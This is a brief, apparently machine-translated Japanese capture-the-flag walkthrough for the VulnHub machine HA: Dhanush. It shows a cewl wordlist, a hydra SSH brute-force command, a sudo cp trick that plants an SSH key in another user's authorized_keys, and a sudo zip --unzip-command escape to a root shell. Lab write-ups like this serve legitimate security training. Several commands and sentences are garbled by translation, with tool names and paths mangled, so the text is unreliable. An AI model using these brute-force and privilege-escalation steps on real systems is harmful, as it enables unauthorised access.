ドローンのダウンロードリンク:
https://www.vulnhub.com/entry/ha-dhanush,396/
ホストスキャン:
ホストのポートスキャン:
HTTPディレクトリのクロール
DIRBにDirSearchクロールを使用可能なディレクトリに存在しませんでした
また、辞書生成ブラストをクロールウェブのため、sshのポートのオープンを参照してください
cewl http://10.10.202.147 -w dict.txt
╰─ヒドラ-L dict.txt 10.10.202.147のssh -s 65345 -e NSR
passwdファイルのアクセス権をコピーする試みヒントない、ユーザーsarangyユーザーはroot権限CPを実行しなければなりません
ここでの考え方は次のとおりです。
その後、pinakユーザーが生成した秘密鍵のペア、およびユーザー・サランのためのユーザー・ディレクトリの.sshのauthorized_keysファイルをコピーするcpコマンドを使用
その後はssh -i rsa_idにログインするために、右を入れてみてください
sudoの-u巣/ binに/ CP ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ジップコマンド権利に言及
sudoのジップ/tmp/test.zip /ホーム/サラン/テスト-T --unzip-コマンド= "SH -c / binに/ bashの"
OVER!